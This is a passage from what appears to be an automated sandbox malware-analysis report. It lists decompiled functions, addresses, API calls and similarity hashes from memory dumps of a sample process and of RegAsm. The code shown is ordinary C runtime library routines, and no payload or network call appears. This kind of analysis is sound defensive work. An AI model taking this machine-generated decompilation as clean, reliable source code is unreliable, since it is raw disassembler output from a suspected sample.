				_t37 = _a16 + _t49;
				_t62[1] = _t62[1] & 0x00000000;
				_t62[2] = _t62[2] & 0x00000000;
				_v5140 = _t54;
				_v5132 = _t37;
				while(_t49 < _t37) {
					_t58 =  &_v5128;
					while(_t49 < _t37) {
						_t46 =  *_t49;
						_t49 = _t49 + 1;
						if(_t46 == 0xa) {
							_t62[2] = _t62[2] + 1;
							 *_t58 = 0xd;
							_t58 = _t58 + 1;
						}
						 *_t58 = _t46;
						_t58 = _t58 + 1;
						_t37 = _v5132;
						if(_t58 <  &_v9) {
							continue;
						}
						break;
					}
					_t59 = _t58 -  &_v5128;
					if(WriteFile(_t54,  &_v5128, _t59,  &_v5136, 0) == 0) {
						 *_t62 = GetLastError();
					} else {
						_t45 = _v5136;
						_t62[1] = _t62[1] + _t45;
						if(_t45 >= _t59) {
							_t37 = _v5132;
							_t54 = _v5140;
							continue;
						}
					}
					L12:
					return E00AB29BB(_v8 ^ _t64);
				}
				goto L12;
			}



















        0x00ab994d
        0x00ab9952
        0x00ab9959
        0x00ab995c
        0x00ab996b
        0x00ab9976
        0x00ab997a
        0x00ab9981
        0x00ab9984
        0x00ab9986
        0x00ab998a
        0x00ab998e
        0x00ab9994
        0x00ab9a01
        0x00ab999c
        0x00ab99a2
        0x00ab99a6
        0x00ab99a8
        0x00ab99ab
        0x00ab99ad
        0x00ab99b0
        0x00ab99b3
        0x00ab99b3
        0x00ab99b4
        0x00ab99b9
        0x00ab99bc
        0x00ab99c2
        0x00000000
        0x00000000
        0x00000000
        0x00ab99c2
        0x00ab99ca
        0x00ab99e6
        0x00ab9a0d
        0x00ab99e8
        0x00ab99e8
        0x00ab99ee
        0x00ab99f3
        0x00ab99f5
        0x00ab99fb
        0x00000000
        0x00ab99fb
        0x00ab99f3
        0x00ab9a0f
        0x00ab9a21
        0x00ab9a21
        0x00000000

        APIs
        • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,00AB9E7F,?,00000000,?,00000000,00000000), ref: 00AB99DE
        • GetLastError.KERNEL32(?,00AB9E7F,?,00000000,?,00000000,00000000,?,00000000), ref: 00AB9A07
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: ]iL
        • API String ID: 442123175-4085116960
        • Opcode ID: 28d8347c2fca788608365d7c8eb0588a85bed847a73390eadd24a731566eab42
        • Instruction ID: 1e6d7de4bc232ae4b90a0590ce9bfb4fd4dc0096d3a0cf55a6b3f9d2d4f78e6d
        • Opcode Fuzzy Hash: 28d8347c2fca788608365d7c8eb0588a85bed847a73390eadd24a731566eab42
        • Instruction Fuzzy Hash: E4219475A002199FCB15CF59DC80BEAB3F9FB48351F1044AEE64AD7252D730AE86CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB621C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 90%
        			E00AB621C(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xac3ed8 + _a4 * 4;
				_t27 =  *0xac3018; // 0x4c695d09
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xac3018; // 0x4c695d09
							goto L13;
						}
						 *_t20 = E00AB3074(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00AB62B8( *_t34);
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xac3018; // 0x4c695d09
						goto L7;
					}
					_t27 =  *0xac3018; // 0x4c695d09
					goto L8;
				}
				L2:
				return _t33;
			}










        0x00ab6227
        0x00ab6230
        0x00ab6236
        0x00ab6240
        0x00ab6242
        0x00ab6246
        0x00ab62b1
        0x00000000
        0x00ab62b1
        0x00ab624a
        0x00ab6250
        0x00ab6256
        0x00ab6272
        0x00ab6272
        0x00ab6274
        0x00ab6276
        0x00ab62a1
        0x00ab62a3
        0x00ab62ab
        0x00ab62af
        0x00000000
        0x00ab62af
        0x00ab6282
        0x00ab6286
        0x00ab629b
        0x00000000
        0x00ab629b
        0x00ab628f
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x00ab6258
        0x00ab6258
        0x00ab625a
        0x00ab6262
        0x00000000
        0x00000000
        0x00ab6264
        0x00ab626a
        0x00000000
        0x00000000
        0x00ab626c
        0x00000000
        0x00ab626c
        0x00ab6293
        0x00000000
        0x00ab6293
        0x00ab624c
        0x00000000

        APIs
        • GetProcAddress.KERNEL32(00000000,?), ref: 00AB627C
        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00AB6289
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: AddressProc__crt_fast_encode_pointer
        • String ID: ]iL
        • API String ID: 2279764990-4085116960
        • Opcode ID: 03e30ba603b1a1f5449c1a468b5313ddfa93089470661de3dcab7d4add67a4da
        • Instruction ID: 10673eeaf327e87ffa1608a4c54df9824993c6115c582d630a00a9ccc19388cd
        • Opcode Fuzzy Hash: 03e30ba603b1a1f5449c1a468b5313ddfa93089470661de3dcab7d4add67a4da
        • Instruction Fuzzy Hash: 0211E937E005259BAF35DFA8DC409EA73ADABC43207164220FD19AB256DA35ED4297D0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB29BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
        Download Yara Rule
        C-Code - Quality: 37%
        			E00AB29BB(void* __ecx, struct _EXCEPTION_POINTERS* _a4) {

				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x2e");
				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



        0x00ab29c1
        0x00ab29c4
        0x00ab29c6
        0x00ab29d1
        0x00ab29da
        0x00ab29f3

        APIs
        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00AB29FF
        • ___raise_securityfailure.LIBCMT ref: 00AB2AE6
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: FeaturePresentProcessor___raise_securityfailure
        • String ID: ]iL
        • API String ID: 3761405300-4085116960
        • Opcode ID: 8f3def2b4404eaf3c3714ab354f515e0a1c9f81bc51f6293855593f63384f99b
        • Instruction ID: 24dbc901ebb02f6703e61090915f37b98acaf3323e9628ec008a9a1c68832295
        • Opcode Fuzzy Hash: 8f3def2b4404eaf3c3714ab354f515e0a1c9f81bc51f6293855593f63384f99b
        • Instruction Fuzzy Hash: 2621E2FB500201AEDB14DF95F946E947BF8FB08314F12806AF9188B3A1E3B196828B44
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB6564 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
        Download Yara Rule
        C-Code - Quality: 28%
        			E00AB6564(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _t18;
				intOrPtr* _t31;
				signed int _t33;

				_t26 = __ecx;
				_push(__ecx);
				_t18 =  *0xac3018; // 0x4c695d09
				_v8 = _t18 ^ _t33;
				_push(__esi);
				_t31 = E00AB621C(0x16, "LCMapStringEx", 0xabe264, "LCMapStringEx");
				if(_t31 == 0) {
					LCMapStringW(E00AB65EC(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
				} else {
					 *0xabd1b8(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
					 *_t31();
				}
				return E00AB29BB(_v8 ^ _t33);
			}







        0x00ab6564
        0x00ab6569
        0x00ab656a
        0x00ab6571
        0x00ab6574
        0x00ab658b
        0x00ab6592
        0x00ab65d5
        0x00ab6594
        0x00ab65b1
        0x00ab65b7
        0x00ab65b7
        0x00ab65e9

        APIs
        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,5EFC4D8B,00000100,?,5EFC4D8B,00000000), ref: 00AB65D5
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: String
        • String ID: ]iL$LCMapStringEx
        • API String ID: 2568140703-2670345515
        • Opcode ID: 90296d6683e05fe2b22d7a3bf4785f120887dc6546665973259b54bfd5548b68
        • Instruction ID: 4d9a67a91ef78993ce33e6555794450622c1efdc2559e458c1b4775eb28124a1
        • Opcode Fuzzy Hash: 90296d6683e05fe2b22d7a3bf4785f120887dc6546665973259b54bfd5548b68
        • Instruction Fuzzy Hash: E401E932540109BBCF12AF90DD06DEE7F6AFF08750F054614FE1965162CA768A31EB90
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB6502 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
        Download Yara Rule
        C-Code - Quality: 20%
        			E00AB6502(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _t8;
				intOrPtr* _t20;
				signed int _t22;

				_push(__ecx);
				_t8 =  *0xac3018; // 0x4c695d09
				_v8 = _t8 ^ _t22;
				_t20 = E00AB621C(0x14, "InitializeCriticalSectionEx", 0xabe25c, 0xabe264);
				if(_t20 == 0) {
					InitializeCriticalSectionAndSpinCount(_a4, _a8);
				} else {
					 *0xabd1b8(_a4, _a8, _a12);
					 *_t20();
				}
				return E00AB29BB(_v8 ^ _t22);
			}







        0x00ab6507
        0x00ab6508
        0x00ab650f
        0x00ab6529
        0x00ab6530
        0x00ab654d
        0x00ab6532
        0x00ab653d
        0x00ab6543
        0x00ab6543
        0x00ab6561

        APIs
        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?), ref: 00AB654D
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: CountCriticalInitializeSectionSpin
        • String ID: ]iL$InitializeCriticalSectionEx
        • API String ID: 2593887523-1193642208
        • Opcode ID: 21d5792640d6ec951290b14261fb03e416517f2777addf90fde6514cf6893873
        • Instruction ID: 06945d7e5217d8f7a373162316a46f24338dfcbee2346023d2a94ecf87d7f668
        • Opcode Fuzzy Hash: 21d5792640d6ec951290b14261fb03e416517f2777addf90fde6514cf6893873
        • Instruction Fuzzy Hash: 06F0B435640208BBCF11AF95DD05DEE7F69EF04720F004255FD091A262DA764A21ABD1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB3F2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
        Download Yara Rule
        C-Code - Quality: 47%
        			E00AB3F2F(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v0;
				signed int _v8;
				void* __ebp;
				signed int _t8;
				int _t14;
				intOrPtr* _t15;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t22;
				void* _t23;
				void* _t27;
				intOrPtr* _t30;
				void* _t37;

				_t28 = __edi;
				_t27 = __edx;
				_t21 = __ebx;
				_t8 =  *0xac3018; // 0x4c695d09
				_t22 = 0x20;
				_t23 = _t22 - (_t8 & 0x0000001f);
				asm("ror eax, cl");
				_t37 =  *0xac3cdc - (0 ^  *0xac3018); // 0x4c695d09
				if(_t37 != 0) {
					_push(0xc);
					_push(0xac1e70);
					E00ABBF00(__edi, __esi);
					_t30 =  *((intOrPtr*)(E00AB4C4A(__ebx, _t23, _t27) + 0xc));
					if(_t30 != 0) {
						_v8 = _v8 & 0x00000000;
						 *0xabd1b8();
						 *_t30();
						_v8 = 0xfffffffe;
					}
					_t14 = E00AB4758(_t21, _t27, _t28, _t30);
					asm("int3");
					if(_v8 != 0) {
						_t14 = HeapFree( *0xac4170, 0, _v0);
						if(_t14 == 0) {
							_push(_t30);
							_t15 = E00AB501F();
							_t17 = E00AB4FA6(GetLastError());
							 *_t15 = _t17;
							return _t17;
						}
					}
					return _t14;
				} else {
					_t20 = E00AB3CF6(_a4);
					 *0xac3cdc = _t20;
					return _t20;
				}
			}
















        0x00ab3f2f
        0x00ab3f2f
        0x00ab3f2f
        0x00ab3f34
        0x00ab3f3e
        0x00ab3f3f
        0x00ab3f43
        0x00ab3f4b
        0x00ab3f51
        0x00ab463a
        0x00ab463c
        0x00ab4641
        0x00ab464b
        0x00ab4650
        0x00ab4652
        0x00ab4658
        0x00ab465e
        0x00ab4669
        0x00ab4669
        0x00ab4670
        0x00ab4675
        0x00ab467f
        0x00ab468c
        0x00ab4694
        0x00ab4696
        0x00ab4697
        0x00ab46a5
        0x00ab46ab
        0x00000000
        0x00ab46ad
        0x00ab4694
        0x00ab46af
        0x00ab3f57
        0x00ab3f5a
        0x00ab3f60
        0x00ab3f66
        0x00ab3f66

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: _abort
        • String ID: ]iL$]iL
        • API String ID: 1888311480-71639355
        • Opcode ID: cd6bc306de73f18178fa7cd9fcf2323c0bbd628986b4bcfb978ed77c102902ef
        • Instruction ID: e8ab7ea2e1f8dc8152d1b00e64c9a15628cbec33ec90cdca8c5faacff2fc9406
        • Opcode Fuzzy Hash: cd6bc306de73f18178fa7cd9fcf2323c0bbd628986b4bcfb978ed77c102902ef
        • Instruction Fuzzy Hash: 3FF0B433614204ABDF14FFB8ED15A9D37A5A705B20F12C115F5049F1A3CB308A459A80
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB63A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
        Download Yara Rule
        C-Code - Quality: 15%
        			E00AB63A7(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _t4;
				intOrPtr* _t16;
				signed int _t18;

				_push(__ecx);
				_t4 =  *0xac3018; // 0x4c695d09
				_v8 = _t4 ^ _t18;
				_t16 = E00AB621C(3, "FlsAlloc", 0xabe220, 0xabe228);
				if(_t16 == 0) {
					TlsAlloc();
				} else {
					 *0xabd1b8(_a4);
					 *_t16();
				}
				return E00AB29BB(_v8 ^ _t18);
			}







        0x00ab63ac
        0x00ab63ad
        0x00ab63b4
        0x00ab63ce
        0x00ab63d5
        0x00ab63e6
        0x00ab63d7
        0x00ab63dc
        0x00ab63e2
        0x00ab63e2
        0x00ab63fa

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Alloc
        • String ID: ]iL$FlsAlloc
        • API String ID: 2773662609-387274156
        • Opcode ID: 831ca6d907d715d1d688f4dcc29f79dbd7fb71765842c8fb5768df0238e23aa7
        • Instruction ID: c8c7dc84918bf4ebcd23f7788380fecaf951daf54610ea41480708e6435f8f9a
        • Opcode Fuzzy Hash: 831ca6d907d715d1d688f4dcc29f79dbd7fb71765842c8fb5768df0238e23aa7
        • Instruction Fuzzy Hash: 8DE02B31B40218B78714EF95ED06EED7BACEB08B20F040665FC0A57393DE769E0296E5
        Uniqueness

        Uniqueness Score: -1.00%

        Function 00AB63FD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000007.00000002.300579400.0000000000AB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AB0000, based on PE: true
        • Associated: 00000007.00000002.300572827.0000000000AB0000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300602504.0000000000ABD000.00000002.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300614103.0000000000AC3000.00000004.00000001.01000000.00000007.sdmpDownload File
        • Associated: 00000007.00000002.300620117.0000000000AC5000.00000002.00000001.01000000.00000007.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_7_2_ab0000_ople.jbxd
        Similarity
        • API ID: Free
        • String ID: ]iL$FlsFree
        • API String ID: 3978063606-402225999
        • Opcode ID: 7a2a3aab9062fec5af04eb170229de71dd58d0af73ac5206a2320342d5d5e82e
        • Instruction ID: fff53efff5b0276efdda518bf8763fe0d9e66ef7edfde1d1ba3ea7003f17d839
        • Opcode Fuzzy Hash: 7a2a3aab9062fec5af04eb170229de71dd58d0af73ac5206a2320342d5d5e82e
        • Instruction Fuzzy Hash: 23E0E531B40218BB8A14EB959D06DEEBB6CEB04B10B410659FC0A57293DD325E1296D9
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        Function 011ED4A0 Relevance: .1, Instructions: 75COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000C.00000002.318290334.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_11ed000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 9290293dd2cf6ba8c8f5330a0ff089a7f99f77baff58162fa38ff7670f55bc5e
        • Instruction ID: e28870d31fe47ceb856f1782e3f31bddf9a0c134124dbef686a825ae840901e0
        • Opcode Fuzzy Hash: 9290293dd2cf6ba8c8f5330a0ff089a7f99f77baff58162fa38ff7670f55bc5e
        • Instruction Fuzzy Hash: F421F4B1604640DFDF09CF94E9C8B26BBB1FB88318F24C569E9054A206C336D855CBA2
        Uniqueness

        Uniqueness Score: -1.00%

        Function 011ED49B Relevance: .1, Instructions: 56COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 0000000C.00000002.318290334.00000000011ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 011ED000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_11ed000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction ID: 7fc1b24ce9cd0b7409fc7061df4b6115d1f11581a6efbc97cdbe4e0f596496d1
        • Opcode Fuzzy Hash: 5150f7a57a8d53df84542f52b091e2a3c21df0421a9b8367837477cfcd62eb91
        • Instruction Fuzzy Hash: E711AF76904680CFDF16CF94D9C4B16BFB1FB84324F24C6A9D9054B256C33AD456CBA2
        Uniqueness

        Uniqueness Score: -1.00%